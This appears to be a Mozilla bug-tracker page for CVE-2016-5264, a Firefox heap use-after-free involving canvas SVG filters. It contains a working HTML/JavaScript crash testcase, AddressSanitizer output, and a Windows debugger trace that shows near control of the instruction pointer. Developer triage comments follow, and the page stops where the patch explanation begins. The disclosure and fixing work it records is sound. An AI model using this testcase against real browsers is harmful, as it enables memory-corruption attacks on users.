Closed Bug 1286183 (CVE-2016-5264) Opened 3 years ago Closed 3 years ago

heap-use-after-free in nsNodeUtils::NativeAnonymousChildListChange

Categories

(Core :: DOM: Core & HTML, defect)

35 Branch
defect
Not set

Tracking

()

VERIFIED FIXED
mozilla50
Tracking Status
firefox47 --- wontfix
firefox48 + verified
firefox49 + verified
firefox-esr45 48+ verified
firefox50 + verified

People

(Reporter: nils, Assigned: smaug)

References

Details

(Keywords: csectype-uaf, regression, sec-high, Whiteboard: [adv-main48+][adv-esr45.3+])

Attachments

(2 files)

The testcase crashes the latest ASAN build of Firefox (BuildID=20160711143746).

<script>
function start() {
        o0=window.document;
        o631=(new DOMParser()).parseFromString('','text/html');
        o652=o631.all[0];
        o652.id='id48';
        document.replaceChild(o631.documentElement,document.documentElement);
        o928=o0.createElement('canvas');
        o1238=o928.getContext('2d',{storage: false,});
        o1238.filter='url(#id48)';
        o0=null;o631=null;o652=null;o928=null;o1238=null;
        window.setTimeout("location.reload()", 30000); // should be enough to trigger CC
}
</script>
<body onload="start()"></body>

=================================================================
==14981==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b00013aad0 at pc 0x7f76ba850eb1 bp 0x7ffdfd43ee90 sp 0x7ffdfd43ee88
READ of size 8 at 0x60b00013aad0 thread T0 (Web Content)
    #0 0x7f76ba850eb0 in nsNodeUtils::NativeAnonymousChildListChange(nsIContent*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsNodeUtils.cpp:177:3
    #1 0x7f76ba515ac7 in mozilla::dom::Element::UnbindFromTree(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Element.cpp:1761:7
    #2 0x7f76ba37689e in AnonymousContentDestroyer::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsContentUtils.cpp:4849:5
    #3 0x7f76ba35256e in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsContentUtils.cpp:5085:5
    #4 0x7f76bea8c6fd in ~nsAutoScriptBlocker /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsContentUtils.h:2787:5
    #5 0x7f76bea8c6fd in nsDocumentViewer::DestroyPresShell() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:4401
    #6 0x7f76bea7b106 in nsDocumentViewer::Destroy() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:1648:5
    #7 0x7f76bea8e9d4 in nsDocumentViewer::Show() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:1980:5
    #8 0x7f76beb02c90 in nsPresContext::EnsureVisible() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresContext.cpp:2000:27
    #9 0x7f76beb2965e in PresShell::UnsuppressAndInvalidate() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:3829:40
    #10 0x7f76beb2d21c in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9820:5
    #11 0x7f76beb2bf37 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4147:11
    #12 0x7f76beb1aa96 in FlushPendingNotifications /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4000:3
    #13 0x7f76beb1aa96 in HandlePostedReflowCallbacks /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:3968
    #14 0x7f76beb1aa96 in PresShell::DidDoReflow(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9425
    #15 0x7f76beb2cfca in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9787:7
    #16 0x7f76beb2bf37 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4147:11
    #17 0x7f76be8511d1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:1797:9
    #18 0x7f76be85d2cc in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:251:7
    #19 0x7f76be85cf99 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:270:5
    #20 0x7f76be85ea14 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:430:9
    #21 0x7f76bf19f314 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #22 0x7f76b8dd2e9a in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20
    #23 0x7f76b88bdeed in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2133:16
    #24 0x7f76b8803747 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1658:14
    #25 0x7f76b8800586 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1596:17
    #26 0x7f76b87ee357 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1563:5
    #27 0x7f76b881dc62 in applyImpl<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #28 0x7f76b881dc62 in apply<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #29 0x7f76b881dc62 in mozilla::detail::RunnableMethodImpl<bool (mozilla::ipc::MessageChannel::*)(), false, true>::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #30 0x7f76b881d24f in Run /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:476:22
    #31 0x7f76b881d24f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:495
    #32 0x7f76b7a45996 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1073:7
    #33 0x7f76b7ac3d3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #34 0x7f76b880aa1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #35 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #36 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #37 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7f76be1d287f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #39 0x7f76c02588a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:837:12
    #40 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #41 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #42 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #43 0x7f76c0257f43 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:667:7
    #44 0x4e2c05 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #45 0x7f76b4af082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #46 0x41e7b8 in _start (/home/nils/fuzzer3/firefox/plugin-container+0x41e7b8)

0x60b00013aad0 is located 0 bytes inside of 104-byte region [0x60b00013aad0,0x60b00013ab38)
freed by thread T0 (Web Content) here:
    #0 0x4b4f0b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f76b79246d4 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2685:9
    #2 0x7f76b79242c6 in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2859:3
    #3 0x7f76b93d002e in AsyncFreeSnowWhite::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/xpconnect/src/XPCJSRuntime.cpp:142:34
    #4 0x7f76b7a45996 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1073:7
    #5 0x7f76b7ac3d3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #6 0x7f76b880aa1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #7 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #8 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #9 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #10 0x7f76be1d287f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f76c02588a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:837:12
    #12 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #13 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #14 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #15 0x7f76c0257f43 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:667:7
    #16 0x4e2c05 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #17 0x7f76b4af082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 (Web Content) here:
    #0 0x4b522b in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e2efd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f76befe5036 in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7f76befe5036 in nsSVGFilterChainObserver::nsSVGFilterChainObserver(nsTArray<nsStyleFilter> const&, nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/nsSVGEffects.cpp:283
    #4 0x7f76bc6399b0 in CanvasFilterChainObserver /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:946:7
    #5 0x7f76bc6399b0 in mozilla::dom::CanvasRenderingContext2D::SetFilter(nsAString_internal const&, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:2614
    #6 0x7f76bb79e899 in mozilla::dom::CanvasRenderingContext2DBinding::set_filter(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitSetterCallArgs) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3049:3
    #7 0x7f76bc56c3ee in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2752:8
    #8 0x7f76c244c6db in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15
    #9 0x7f76c244c6db in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441
    #10 0x7f76c244e828 in InternalCall /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:498:12
    #11 0x7f76c244e828 in Call /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:517
    #12 0x7f76c244e828 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:644
    #13 0x7f76c24bbc4f in SetExistingProperty /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.cpp:2364:10
    #14 0x7f76c24bbc4f in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.cpp:2399
    #15 0x7f76c242cd45 in SetProperty /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.h:1495:12
    #16 0x7f76c242cd45 in SetPropertyOperation /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:256
    #17 0x7f76c242cd45 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2666
    #18 0x7f76c241a03b in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #19 0x7f76c244cd80 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #20 0x7f76c244d3f1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #21 0x7f76c1f91898 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2839:12
    #22 0x7f76bc081540 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f76bc9b797b in Call<nsISupports *> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f76bc9b797b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/JSEventHandler.cpp:214
    #25 0x7f76bc984b6f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1116:16
    #26 0x7f76bc9866ed in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1288:17
    #27 0x7f76bc96210c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:379:5
    #28 0x7f76bc966470 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:710:9
    #29 0x7f76bea84d65 in nsDocumentViewer::LoadComplete(nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:996:7
    #30 0x7f76bf7e5cd1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7577:5
    #31 0x7f76bf7e1d01 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7378:7
    #32 0x7f76bf7e8f7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7275:13
    #33 0x7f76b983cba1 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:1252:3
    #34 0x7f76b983bc54 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:836:5
    #35 0x7f76b9838adc in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:726:9
    #36 0x7f76b983abb4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:608:5
    #37 0x7f76b983b6ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:464:14
    #38 0x7f76b7c1879b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsLoadGroup.cpp:633:18

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsNodeUtils.cpp:177:3 in nsNodeUtils::NativeAnonymousChildListChange(nsIContent*, bool)
Shadow bytes around the buggy address:
  0x0c168001f500: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c168001f510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c168001f520: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
  0x0c168001f530: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c168001f540: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c168001f550: fd fd fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd
  0x0c168001f560: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c168001f570: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c168001f580: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c168001f590: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c168001f5a0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==14981==ABORTING
A non-asan build on Windows crashes as follows (almost direct control of the instruction pointer):

(2054.a04): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!nsNodeUtils::NativeAnonymousChildListChange+0xa2:
575ccfd6 ff501c          call    dword ptr [eax+1Ch]  ds:002b:e5e5e601=????????
0:000:x86> kp 16
 # ChildEBP RetAddr
00 0058ed74 5731164b xul!nsNodeUtils::NativeAnonymousChildListChange(class nsIContent * aContent = 0x0d3904c0, bool aIsRemove = true)+0xa2 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nsnodeutils.cpp @ 177]
01 0058eda0 5730f616 xul!mozilla::dom::Element::UnbindFromTree(bool aDeep = true, bool aNullParent = true)+0x262 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\element.cpp @ 1764]
02 0058edb8 575327de xul!nsXULElement::UnbindFromTree(bool aDeep = true, bool aNullParent = true)+0x49 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\xul\nsxulelement.cpp @ 919]
03 0058edc8 573128ce xul!AnonymousContentDestroyer::Run(void)+0x15 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nscontentutils.cpp @ 4828]
04 0058edec 573eea02 xul!nsContentUtils::RemoveScriptBlocker(void)+0x8b [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nscontentutils.cpp @ 5065]
05 (Inline) -------- xul!nsAutoScriptBlocker::{dtor}+0x5 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nscontentutils.h @ 2772]
06 0058ee04 573ebf20 xul!nsDocumentViewer::DestroyPresShell(void)+0x53 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsdocumentviewer.cpp @ 4401]
07 0058ee28 5744383d xul!nsDocumentViewer::Destroy(void)+0xcc [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsdocumentviewer.cpp @ 1648]
08 0058ee6c 574437cb xul!nsDocumentViewer::Show(void)+0x42 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsdocumentviewer.cpp @ 1983]
09 0058ee90 574434da xul!nsPresContext::EnsureVisible(void)+0x81 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsprescontext.cpp @ 2001]
0a 0058ee98 5717c0d7 xul!PresShell::UnsuppressAndInvalidate(void)+0x17 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 3829]
0b 0058eef4 571daa40 xul!PresShell::ProcessReflowCommands(bool aInterruptible = true)+0x1a9 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 9819]
0c 0058efb0 5731de70 xul!PresShell::FlushPendingNotifications(struct mozilla::ChangesToFlush aFlush = struct mozilla::ChangesToFlush)+0x1ec [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 4147]
0d 0058efc8 573d58d9 xul!PresShell::FlushPendingNotifications(mozFlushType aType = Flush_InterruptibleLayout (0n4))+0x1d [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 4001]
0e 0058efdc 573d570c xul!PresShell::HandlePostedReflowCallbacks(bool aInterruptible = true)+0x80 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 3968]
0f 0058eff4 5717bffc xul!PresShell::DidDoReflow(bool aInterruptible = true)+0x1a [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 9426]
10 0058f054 571daa40 xul!PresShell::ProcessReflowCommands(bool aInterruptible = true)+0xce [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 9790]
11 0058f110 571f7151 xul!PresShell::FlushPendingNotifications(struct mozilla::ChangesToFlush aFlush = struct mozilla::ChangesToFlush)+0x1ec [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nspresshell.cpp @ 4147]
12 0058f230 571f6209 xul!nsRefreshDriver::Tick(int64 aNowEpoch = 0n1468310880916486, class mozilla::TimeStamp aNowTime = class mozilla::TimeStamp)+0x26e [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsrefreshdriver.cpp @ 1800]
13 0058f264 571f619c xul!mozilla::RefreshDriverTimer::TickDriver(class nsRefreshDriver * driver = 0x0a2dfc00, int64 jsnow = 0n1468310880916486, class mozilla::TimeStamp now = class mozilla::TimeStamp)+0x40 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsrefreshdriver.cpp @ 280]
14 0058f29c 571f610c xul!mozilla::RefreshDriverTimer::TickRefreshDrivers(int64 aJsNow = 0n1468310880916486, class mozilla::TimeStamp aNow = class mozilla::TimeStamp, class nsTArray<RefPtr<nsRefreshDriver> > * aDrivers = <Value unavailable error>)+0x5d [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsrefreshdriver.cpp @ 251]
15 0058f2d8 571f5932 xul!mozilla::RefreshDriverTimer::Tick(int64 jsnow = 0n1468310880916486, class mozilla::TimeStamp now = class mozilla::TimeStamp)+0x97 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsrefreshdriver.cpp @ 272]
0:000:x86> r
eax=e5e5e5e5 ebx=0a280800 ecx=0f6ec310 edx=0d3889a4 esi=0d3904c0 edi=00000001
eip=575ccfd6 esp=0058ed40 ebp=0058ed74 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210203
xul!nsNodeUtils::NativeAnonymousChildListChange+0xa2:
575ccfd6 ff501c          call    dword ptr [eax+1Ch]  ds:002b:e5e5e601=????????
Component: Canvas: 2D → DOM
Can you look at this, Olli? Thanks.
Flags: needinfo?(bugs)
yup, patch coming. The SVGEffects code is a bit messy.
Assignee: nobody → bugs
Flags: needinfo?(bugs)
FWIW, this is a regression from bug 1062832.
Attached patch patchSplinter Review
The issue is that when nsSVGIDRenderingObserver::~nsSVGIDRenderingObserver() 
